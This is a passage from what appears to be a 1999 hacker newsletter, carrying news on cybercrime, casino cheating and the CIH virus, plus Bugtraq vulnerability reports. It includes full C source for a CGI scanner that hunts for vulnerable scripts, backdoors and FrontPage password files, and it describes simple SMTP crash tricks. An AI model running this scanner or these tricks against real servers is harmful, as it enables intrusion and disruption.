Investigates after Dallas Police refused to look into his complaint. News 8 tracked the delivery address for the notebook computer to a North Dallas apartment complex. A woman who answered the door denied having every heard of David Dunagan. "Never heard of David Dunagan," she said. "No, I can't help you." Despite that denial, the apartment's manager said this resident asked that packages addressed to David Dunagan be delivered to her unit. It turns out that Dunagan's office assistant is her roommate. After searching the hard disk drive of the assistant's computer at work, Dunagan fired her. Dunagan was frustrated that police could not help him. "Their approach was, 'okay, well, we're too busy. We're too overloaded. We're too overworked right now to really deal with this, so thank you very much." CYBERCROOKS -- A STEP AHEAD Walt Manning investigated computer crime for the Dallas Police Department, but two years ago, the high tech crimefighting unit was disbanded. "You may or may not be able to find anybody that can help you -- not because they're not willing, just because they don't know how," Manning explained. Manning also said these cybercrooks may be way ahead of law enforcement agencies. "We are starting to see terrorists recruit hackers," he said. "I have read reports that show there are drug cartels in the world that now have professional hackers on their payroll, and have the capability to wage information warfare against the United States." In fact, at the start of the air war against Yugoslavia, Serbian hackers bombarded NATO's website. They overloaded its computer with electronic mail "bombs" until it crashed. No one is safe. Hackers also defaced the Justice Department web page with Nazi swastikas and pornography. They even hit the CIA, renaming the spy agency the "Central Stupidity Agency." CRIME OF THE MILLENNIUM?" Matt Yarborough, the federal computer crimes prosecutor for North Texas, said this is the crime of the millennium. "Think about it," he said. "More and more traditional modes of communication are going on line to the Web." Yarborough warns that hackers can steal confidential information about customers from unsecured websites, and businesses can lose millions of dollars in sales if hackers shut down those websites. "We are adding hundreds, thousands, millions of people per year to the Internet," Yarborough said, "and remember -- anybody can be a hacker. Any individual sitting at their keyboard can choose to hack." HACKERS SHARE INFO ON THE INTERNET How do they do it? Hundreds of hacker sites on the Internet make cyber burglary tools widely available. Some feature an international menu of programs to attack systems. They offer how-to manuals for beginners. One software program cracks the mathematical formula used by credit card companies, generating valid numbers that often pass security checks. There are many more highly sophisticated programs useful for stealing information. FBI Agent Mike Morris demonstrated how a picture of a starburst can conceal a written document. With just a click, he revealed the hidden message. He explained that this technique could be useful for terrorists or military spies or even industrial espionage. "It could be the company's most valuable trade secret.," Morris said. "'Here mom, here's a picture of Johnny riding his bicycle.' Inside, there is a secret formula for whatever you are working on." It's against the law to even try to break into a computer system, but hacker tools are legal to own until you use them. In response, the FBI and U.S. Attorney urge companies to form neighborhood watches for computer fraud -- and not to sweep break-ins under the carpet. PROTECTING YOURSELF Here are some tips to protect yourself when making purchases over the Internet: Be suspicious of anyone who uses an anonymous e-mail address and doesn't give their name, address, and telephone number. Never send your credit card number by e-mail. Be wary of sending checks or money orders. If you are going to do business on the Internet, there are a lot of questions you should be asking about how your information is protected. @HWA 16.0 Cracking the casinos, a Defcon primer? *g* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Silicon Crackers Tackle Casinos by Vince Beiser 3:00 a.m. 3.May.99.PDT First of two parts LAS VEGAS -- Dennis Nikrasch has been tried, convicted, and sentenced to seven-and-a-half years in Nevada state prison. Still, no one really knows how he stole that US$6 million. What is generally agreed on, though, is that Nikrasch, 57, is one of the greatest slot-machine cheats in history -- and the most technologically adept. "Nikrasch," said Keith Copher, chief of enforcement for Nevada's Gaming Control Board, "is the most sophisticated cheat we've seen." Nikrasch started out in the 1970s, rigging mechanical-reel slots. His skills, however, have kept pace with the times. Last fall, a months-long FBI investigation nailed him and several confederates for scamming millions in cars and cash by cracking the silicon chips that control today's computer-based slot machines. Nikrasch is only one of a growing number of hustlers using advanced technology to rip off casinos. In belated response, the gambling industry is just beginning to deploy state-of-the-art security technology. The stakes of this technological race are mounting rapidly, as the multibillion-dollar gambling industry spreads across the country. Slot cheating alone is estimated to cost casinos some $40 million a year. The equipment is easy to come by. You can buy an astonishing array of devices to help you cheat at slots or cards at the Hackers Home Page, for instance. Counting cards is not illegal; using a device to help you do it, however, is a felony. That hasn't deterred a generation of grifters from putting the ultimate counting devices -- computers -- to work for them. Andy Andersen, a veteran Las Vegas private investigator, keeps a scrapbook of all the scams he's seen. On Page 1 is a Polaroid of a man with a lunchbox-sized computer on his hip, wired clumsily to a bandoleer of batteries around his chest. The year was 1978; it was the first wearable card-counting computer Andersen had seen. "Cheats have been using technology since long before the casinos ever thought they were," said Andersen. The clunky hip-computer soon gave way to the "toe-tapper," a computer small enough to be hidden in a player's boot. A player uses his toes to record which cards are dealt, and the computer emits tiny electric shocks to indicate when to hit or stand. Toe-tappers are still used, but the latest card scam turned up last fall in Atlantic City. Casino security staff discovered that a man playing high-stakes mini-baccarat had a subminiature video camera disguised as a button on his coat sleeve, which he positioned to monitor the cards as they slid out of the mechanical shuffling machine. His partner was watching the video from a van in the parking lot, then radioing back, via a tiny receiver in the player's ear, which cards were coming up. For fast money, nothing beats the slot machines. Some older machines can still be successfully jacked with equipment as primitive as a dollar on a piece of duct tape that can be yanked back after triggering a credit, or a tiny light bulb on a wire that blinds the machines' optic counter so that it keeps spitting out coins. "There are lots of little ways to cheat," said Frank Luizzo, a former Nevada state trooper who used to infiltrate cheating gangs. "But the guys who use electronics are going after the cars, the boats, the millions of dollars. That's balls, big balls." Take Barry Zeltner. Last year, Zeltner figured out a way to run a static electric shock through video keno machines in several Nevada casinos, forcing them to reset. Zeltner would then play a series of numbers he knew were more likely to come up after a resetting. He scammed an estimated $750,000, got caught, jumped bail, and is currently on the run. Nikrasch, however, is believed to have pulled in about $10 million in the late 1970s, a run that earned him five years in prison. He was only out for a few years before he began his chip-hacking scam. No one has figured out exactly how he beat the chips, and Nikrasch isn't saying. "I have no desire to explain anything to the public," he wrote Wired News from jail. "Never smarten up a chump." Court documents and interviews with law-enforcement officials, however, reveal most of the story. Nikrasch apparently bought a slot machine to practice on at home and obtained extra computer chips from the machine's manufacturer. He probably got the keys required to open the casinos' machines on the black market, where casino employees can sell copies for thousands of dollars. In the casinos, his partners would crowd around to block the surveillance camera's view while Nikrasch opened the machine and the housing around the computer chip. He would then attach clips to either side of the chip, use a handheld device to force-feed it the jackpot code, and close the works back up -- all in under a minute. One of Nikrasch's partners would then sit down to "play." The next coin, of course, would trigger the jackpot. There's no way of knowing how many other technology-driven scams are going on or how much they cost the gambling industry. Unlike other businesses, there's no lost inventory to count. "You don't know you're being cheated," said Copher, "until you catch someone." Copher should know. Just last year, Gaming Control arrested a man for rigging the computer programs in several slots to scam $50,000. The cheat turned out to be one of his own agents. PART II Casinos Fight Back with Tech Vince Beiser 3:00 a.m. 4.May.99.PDT Second of two parts. LAS VEGAS -- The surveillance cameras pick up Andy Andersen the instant he steps into the vast casino at Caesars Palace. He strolls through banks of slot machines and over to the blackjack tables to chat with a pit boss he knows. By that time, a security agent is on the phone to the pit, demanding to know why Andersen's there. There can be only one reason: trouble. Andersen is famous in Las Vegas security circles as a top-notch private investigator, a pioneer who uses cutting-edge technology to catch card counters, slot scammers, and all manner of casino cheats. He is best known for his remote-monitoring system. Using a laptop and a cell phone-modem, Andersen can link into a client casino's surveillance system from anywhere, check a suspected grifter's face against his private database, and tell surveillance whether to evict him. Tonight, however, Andersen, his white hair gelled back and a pair of tiny gold handcuffs on a chain around his neck, is just checking on the progress of a new system he plans to take online in 1999. It will move casino surveillance technology to a new level: a digital casino network that incorporates biometric facial recognition technology. "We've got to get into high technology," said Andersen, "because the cheaters have." Most casino security systems are surprisingly behind the technological times, thanks to the complacency of their old-school owners and the vast profits they rake in despite the cheaters. But as the gambling companies grow ever larger and more sophisticated, the casinos are beginning to realize how tech-savvy cheaters are ripping them off. And they're moving to catch up. "The technology we have now is ancient," said Frank Luizzo, a former Nevada state trooper who now oversees security for Las Vegas' Hard Rock Hotel & Casino. "The industry didn't realize how much it was losing, so it didn't want to invest more in security. But that's changing now." The surveillance room of the Tropicana, a Strip landmark, is typical: In a windowless room suffused with a deep cathode glow and the low thrumming of machinery, two officers sit hunched over keypads, scanning a wall of 52 mostly low-resolution, black-and-white monitors. When someone on the casino floor catches the watchers' interest, they use a joystick to zoom in, rotating or tilting the cameras as needed. Meanwhile, the images on the other monitors change every few seconds, cycling through the views from each of hundreds of ceiling-mounted cameras. Against a wall, 220 VCRs ceaselessly record everything the cameras see. It's a clunky system. The tapes have to be reviewed manually, are a nuisance to archive, and leave many casinos periodically "blind" for a few seconds while fresh cassettes are put in. More-flexible digital systems are only just hitting the market. California-based Sensormatic's Intellex system is one of the most sophisticated. A Pentium-equipped PC controls up to 16 digital cameras, all feeding into a single monitor via an ISDN line. Everything is archived to DAT tape, which can then be searched with "motion filters." Users highlight, say, a stack of chips with a mouse, and the computer searches through hours of tape in seconds to find every instance where those chips moved. Casino floor managers, or detectives like Andersen, can also tap into the system at any time from their laptops. The trouble, said Sensormatic spokesman Alex Durazo, is that "it's not real time, just 15 to 20 frames per second. That means you could miss split-second movements." Real-time digital recording is still prohibitively expensive, considering that most casinos have upwards of several hundred cameras recording nonstop. Digital recordings are also inadmissible in court because of concerns over the ease with which they can be altered. The industry's prevailing mindset, however, also slows the acceptance of new technologies. Ask Oliver Schubert, president of Casino Software & Services, which developed a voice-controlled program that analyzes blackjack players to determine whether they are counting cards. "When we started seven years ago, we had to supply the computers along with the software system because most casinos didn't have them," said Schubert. "There are a lot of old-timers in this business who just want to do things the way they always have." Among the antiquated weapons in the Strip's defensive arsenal is a fax network linking a dozen or so casinos. Today, when surveillance at one casino spots a cheater, it faxes a picture of the miscreant to everyone else in the network. "Half the time, it just comes out a black square," said Keith Michaels, the Tropicana's director of surveillance. That network is exactly what Andersen's company, CVI, is out to replace. Starting sometime in mid-May, CVI's network will connect at least 15 casinos around the country, enabling them to digitally transmit scanned images of cheaters to each other. Andersen can also provide remote assistance with his laptop surveillance system. But his job, too, will become partly automated. Using technology marketed by CVI partner Biometrica Systems, the system will also allow surveillance agents to capture a live image of a suspicious player's face, then run it against a digitized photo database of known cheaters for instant identification. The system has already been installed in three major casinos. "As gambling spreads, there are more cheats to watch in more casinos," said Andersen. And more ways than ever to watch them. @HWA 17.0 Crackers gearing up to attack U.S nuke labs? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://cnn.com/US/9905/03/us.china.spy/ Report warned of cyber attacks on nuclear labs May 3, 1999 Web posted at: 1:01 a.m. EDT (0501 GMT) WASHINGTON (CNN) -- A classified report from U.S. intelligence agencies warned the Clinton administration in November that computer systems at national nuclear weapons labs were vulnerable to cyber attacks, a senior administration official told CNN on Sunday. Yet a Taiwan-born researcher, suspected of downloading sensitive files while working at the Los Alamos National Laboratory in New Mexico, was able to keep high-level security clearance until his firing in March. Wen Ho Lee reportedly took information from a secure computer database at the laboratory and transferred it to a less secure system, which would have been accessible from outside the lab. The agencies conducted the threat assessment as a result of a directive issued in February 1998 by President Clinton, after allegations that China obtained U.S. nuclear secrets by penetrating the Los Alamos National Laboratory. A senior U.S. lawmaker predicted Sunday that there would be more "revelations" concerning suspected nuclear espionage by China. "The damage was bad, a lot worse than people ever imagined," said Sen. Richard Shelby (R-Alabama). "I'm afraid they have a lot more than we ever dreamed," said Shelby, chairman of the Senate Intelligence Committee, on "Fox News Sunday." The November report documents more than 200 attempts to infiltrate non-secure computer systems at the nuclear laboratories. But nuclear laboratories are not the only vulnerable government facilities. A number of federal agencies, including the Department of Defense, are routinely attacked by hackers. The threat assessment warned that China, Russia and India could seek U.S. nuclear secrets. A number of government investigations warned various administrations dating back to President Bush about lax security at the labs. One recent General Accounting Office report raised concerns about a U.S. overseas visitor program that allowed hundreds of visits without background checks. Last October, Energy Secretary Bill Richardson initiated a number of measures to improve security at the nuclear labs. In mid-March of this year, he launched a program to improve cyber security. Later in the month, Richardson learned of the cyber spying allegations against Lee. According to Richardson, the information in question related to simulated testing for nuclear weapons and nuclear weapons design. The FBI, which had been investigating Lee since 1996, had attempted without success to have the Justice Department approve a court-authorized wire tap or search warrant. Justice officials had questioned whether there was enough evidence to pursue a wire tap or search warrant. Richardson said he shut down computer work at the labs for two weeks beginning April 2 of this year. Lee agreed to allow the FBI and Energy Department to check his computer files. He has denied any wrongdoing and has not been charged with any crime. He was fired in March from his Los Alamos post for allegedly failing to inform Energy officials about contacts with China, and allegedly failing to safeguard classified materials. Shelby said his committee would soon focus on how the Justice Department and the FBI dealt with Lee, who reportedly came to the attention of investigators in 1994. "There is a lot of blame to go around, and I think it's serious," Shelby said. Lawmakers including Shelby have questioned why so many warnings seemed to go unheeded, and why it took so long to zero in on Lee's alleged activities. "It looks to me like this is a botched investigation by the FBI, and I think there is some culpability with the Justice Department," Shelby said. "I think the Justice Department treated this as an ordinary case when it should have been an extraordinary case." Justice officials were not available for response. Justice Correspondent Pierre Thomas and Reuters contributed to this report. @HWA 18.0 Calling all | Taiwan college identifies computer virus author TAIPEI, Taiwan (AP) - A former computer engineering student was identified by his college today as the author of the Chernobyl virus - the menace that caused hundreds of thousands of computer meltdowns around the world this week. The Tatung Institute of Technology had punished Chen Ing-hau last April when the virus he wrote as a student began to cause damage in an inter-college data system, according to Lee Chee-chen, the institute's dean of student affairs. Chen, who was a senior at the time, was given a demerit but not expelled. The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials. The college did not mete out a more severe punishment because Chen had warned fellow students not to spread the virus, Lee said. Chen did not come up with an anti-virus program, Lee said. Lee said he was not sure how the virus ended up causing so much destruction a year later. Chen graduated from the college last summer and now is serving Taiwan's two-year compulsory military service, Lee said. Officials of the Bureau of Criminal Investigation said they would seek permission to question Chen. The unusually destructive virus - timed to strike on April 26, the 13th anniversary of the Chernobyl nuclear disaster - tries to erase a computer's hard drive and write gibberish into its system settings to prevent the machine from being restarted. Turkey and South Korea each reported 300,000 computers damaged Monday, and there were more elsewhere in Asia and the Middle East. Fewer than 10,000 of the 50 million computers in the United States were affected. Copyright 1999 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 32.0 [ISN] Taiwan virus suspect free on lack of victims ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9904/30/virus.computer.reut/index.html Taiwan virus suspect free on lack of victims April 30, 1999 Web posted at: 11:59 a.m. EDT (1559 GMT) TAIPEI, Taiwan (Reuters) -- Investigators said on Friday a Taiwan hacker admitted creating the Chernobyl virus that ravaged computers worldwide but said a lack of any local plaintiffs made it difficult to charge him. Police said Chen Ing-hau, a 24-year-old information engineer now serving mandatory military service, was questioned but not charged and the probe hinged on finding victims. "He's not a criminal here as long as no one registers a complaint," a Taipei police spokeswoman said. "All we know about problems with the virus is what we've seen in foreign news reports." Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming up hundreds of thousands of computers in South Korea, Turkey and China and thousands in India, Bangladesh, the Mideast and elsewhere. Police said no infections had been reported in Taiwan. Chen was questioned on suspicion of intentionally spreading a computer virus, a crime that carries a possible three-year prison term, and could be charged if victims come forth. A bashful Chen, in brief comments after he was released, expressed remorse and offered to help victims remove the virus from their computers. Authorities said Chen created the virus while studying at Tatung Institute of Technology, which had disciplined him a year ago after learning about the computer program, and did not pursue the matter further with authorities. Dubbed Chernobyl because it strikes on anniversaries of the April 26, 1986, Soviet nuclear disaster, the virus is known to experts as CIH -- which Chen acknowledged were his initials. Chernobyl and other CIH variants are among the most damaging viruses of recent years, less widespread than the e-mail replicator virus "Melissa" that swamped Internet servers around the world in April but far more vicious. Chernobyl/CIH employs a "spacefilling" technique that clogs up a computer's hard-disk storage system, crashing most systems and in many cases making restart impossible. Western virus experts first traced Chernobyl/CIH to Taiwan in June 1998 and said it had spread worldwide via the Internet and other networks within a week. Chernobyl's virulence and Taiwan's seemingly lenient handling of its author have kindled a debate about how the world should combat viruses. In the United States, where the Melissa virus's spewing of duplicate e-mail messages forced many firms to shut down their overtaxed computer networks, alleged author David Smith faces the possibility of 40 years in prison if convicted. ZDNet writer Robert Lemos, in an Internet dispatch, said Taiwan's Chen "was not prosecuted, but merely reprimanded and given a demerit" by his school. "The immense differences in punishment illustrate a large rift in perceptions over the seriousness of computer viruses," Lemos wrote, adding that while "Melissa was essentially benign, CIH was deadly to some computers." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 33.0 cgichk 1.34c modification adds port numbers by 'Joe Hacker' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ---------------------------------------------------------------------- */ /* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */ /* Tested on Slackware linux with kernel 2.0.35;2.0.36; */ /* FreeBSD 2.2.2-3.1;IRIX 5.3 */ /* Source c0de by [CKS & Fdisk] */ /* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/ /* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */ /* hypoclear of lUSt */ /* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */ /* hey! v0rt-fu if u kewl programmer u must write u own proggi, */ /* and stop modify th1s scanner...(i can do it better and CKS ;) */ /* hmm, remember if u can add 2 CGi to scanner u can't change */ /* real Version number and name.....better go read 'C' Bible ;-) */ /* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */ /* -----------------------------------------------[02:30 04.05.99 UnlG]- */ /* codex@bogus.net // added misc TCP port support 06.05.99 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cgibuff[1024]; char *buff[100]; /* Don't u think 100 is enought? ;-)*/ char *cginame[100]; /* Don't u think 100 is enought? */ int myport = 80; buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */ buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n"; buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n"; buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[52] = "GET /search97.vts HTTP/1.0\n\n"; buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi , rule? ;-) */ cginame[1] = "UnlG - backd00r "; cginame[2] = "THC - backd00r "; cginame[3] = "phf..classic :) "; cginame[4] = "Count.cgi "; cginame[5] = "test-cgi "; cginame[6] = "nph-test-cgi "; cginame[7] = "php.cgi "; cginame[8] = "handler "; cginame[9] = "webgais "; cginame[10] = "websendmail "; cginame[11] = "webdist.cgi "; cginame[12] = "faxsurvey "; cginame[13] = "htmlscript "; cginame[14] = "pfdisplay "; cginame[15] = "perl.exe "; cginame[16] = "wwwboard.pl "; cginame[17] = "www-sql "; cginame[18] = "view-source "; cginame[19] = "campas "; cginame[20] = "aglimpse "; cginame[21] = "glimpse "; cginame[22] = "man.sh "; cginame[23] = "AT-admin.cgi "; cginame[24] = "filemail.pl "; cginame[25] = "maillist.pl "; cginame[26] = "jj "; cginame[27] = "info2www "; cginame[28] = "files.pl "; cginame[29] = "finger "; cginame[30] = "bnbform.cgi "; cginame[31] = "survey.cgi "; cginame[32] = "AnyForm2 "; cginame[33] = "textcounter.pl "; cginame[34] = "classifields.cgi"; cginame[35] = "environ.cgi "; cginame[36] = "service.pwd "; cginame[37] = "users.pwd "; cginame[38] = "authors.pwd "; cginame[39] = "administrators "; cginame[40] = "shtml.dll "; cginame[41] = "shtml.exe "; cginame[42] = "args.bat "; cginame[43] = "uploader.exe "; cginame[44] = "bdir - samples "; cginame[45] = "CGImail.exe "; cginame[46] = "newdsn.exe "; cginame[47] = "fpcount.exe "; cginame[48] = "openfile.cfm "; cginame[49] = "exprcalc.cfm "; cginame[50] = "dispopenedfile "; cginame[51] = "sendmail.cfm "; cginame[52] = "search97.vts "; cginame[53] = "carbo.dll "; if (argc<2) { printf("\n [-- CGI Checker 1.34. Modified by su1d sh3ll //UnlG --]"); printf("\nusage : %s host ",argv[0]); printf("\n Or : %s host -d for debug mode\n\n",argv[0]); exit(0); } /* --- seriously rubbish hack, but never mind (codex@bogus.net) */ if(argv[2]) { if(strstr("-d",argv[2])) { debugm=1; } if(atoi(argv[2])) { myport=atoi(argv[2]); } else { printf("Error: need a valid port\n"); exit(0); } } if(argv[3]) { if(strstr("-d",argv[3])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(myport); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); /* CKS sorry, but ur new piece of code don't work :-( */ send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) printf("Found !! ;)\n"); else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } printf("...have a nice hack... ;-)\n"); } @HWA 34.0 Microsoft Netmeeting Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 4 May 1999 13:12:09 -0300 From: Wanderley J. Abreu Junior To: BUGTRAQ@netspace.org Subject: Microsoft Netmeeting Hole Since I hadn't any response from Microsoft and a formal response from CERT i'm putting it here hopping for a helping hand on this problem. Version 1.0 October 1996 CERT(sm) Coordination Center Product Vulnerability Reporting Form If you know of a vulnerability in a product, please complete this form and return it to cert@cert.org. We aren't able to acknowledge each report we receive; however, if we have additional questions, we will contact you for further information. We prefer that any vulnerability information you send to us be encrypted. We can support a shared DES key or PGP. Contact the CERT staff for more information. The CERT PGP public key is available in ftp://info.cert.org/pub/CERT_PGP.key Thanks, we appreciate your taking the time to report this vulnerability. Please describe the vulnerability. - --------------------------------- What is the impact of this vulnerability? - ---------------------------------------- (For example: local user can gain root/privileged access, intruders can create root-owned files, denial of service attack, etc.) a) What is the specific impact: Users running MS NetMeeting Version 2.1 (The one that comes with windows 98) software in a conference can copy/paste the remote clipboard area. b) How would you envision it being used in an attack scenario: With the chat windows OPENED just do a CTRL-C in the box where you write with nothing in your box and nothing selected at all. then, you can get the entire clipboard from the other user in the conference, of course, if there's something in his Clipboard (ASCII, Bin, etc). To your knowledge is the vulnerability currently being exploited? - ---------------------------------------------------------------- [no] If there is an exploitation script available, please include it here. - -------------------------------------------------------------------- Do you know what systems and/or configurations are vulnerable? - ------------------------------------------------------------- [yes] (If yes, please list them below) System : Windows 95, 98 and NT OS version : All Versions Verified/Guessed: Guessed Are you aware of any workarounds and/or fixes for this vulnerability? - -------------------------------------------------------------------- [yes] (If you have a workaround or are aware of patches please include the information here.) I'm using PGP to encrypt the clipboard area. OTHER INFORMATION =========================================================================== Is there anything else you would like to tell us? Please, send me some feedback abou this bug i'm working on a solution but seems NetMeeting to use some sort of Common Clipboard to build all the share enviroments. If you ever heard abou this bug, please also let me know. Thank you. Best Regards, Wanderley Junior @HWA 35.0 IBM AS400+Domino vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 4 May 1999 08:53:14 +0200 From: Joachim Larsson To: BUGTRAQ@netspace.org Subject: AS/400 Hello all. I played around with smtp on a as/400+domino machine and found two obvious bugs, then notified IBM, revieved a ptf, then posted here. 1: telnet (host) 25, then start feeding chars. After about 200-300 chars the smtp-subsystem will die, needing to be restarted. 2: change your replyto-address and fromaddress to an non-existing user/domain then mail to an non-existing user on the 400/domino. This will cause the mail to loop endlessly between the smtp-subsystem and the domino subsystem. This is for general knowledge only, trying to "force" people with 400/domino to react and secure their machines. Sincerely, --- (put your favourite signature here) ----------------------------------------------------------------------------- Date: Wed, 5 May 1999 08:52:42 -0500 From: Ryan Permeh To: BUGTRAQ@netspace.org Subject: Re: AS/400 Yeah, i found this a while back on non domino smtp daemons on as400's also. it's a somewhat simple solution to fix (just turn the SMTP service back on), but SMTP can be shut off across the network. i know this worked on as400 3.X, i haven't had a chance to test on any of the domino types or the 4.X OS levels Ryan ----------------------------------------------------------------------------- Date: Wed, 5 May 1999 13:34:40 +0200 From: Pavel Ahafonau To: BUGTRAQ@netspace.org Subject: Re: AS/400 >I played around with smtp on a as/400+domino machine and found two >obvious bugs, then notified IBM, revieved a ptf, then posted here. >1: telnet (host) 25, then start feeding chars. After about 200-300 >chars the smtp-subsystem will die, needing to be restarted. >2: change your replyto-address and fromaddress to an non-existing >user/domain then mail to an non-existing user on the 400/domino. This >will cause the mail to loop endlessly between the smtp-subsystem and the >domino subsystem. This is good known bug which is not related to AS/400 at all. This causes to die only Lotus Domino 4.6.1. I've tried to kill our Lotus Domino 4.6.4 and it still alive ~80) As for SMTP and Lotus Notes/Domino this is a big problem for it's users because there no any anti-spam protection like in Sendmail. Now we are playing with 5th Lotus Domino and there are all this bugs fixed and anti-spam implemented ~80) Best regards, Paully A. Ahafonau. International Business Alliance (http://www.iba.com.by) @HWA 36.0 Gateprobe.c Wingate Scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*************************************** Gateprobe is back... Version: 2.1 fixed With lot of news features Added: -IP resolving -Scan class A -View 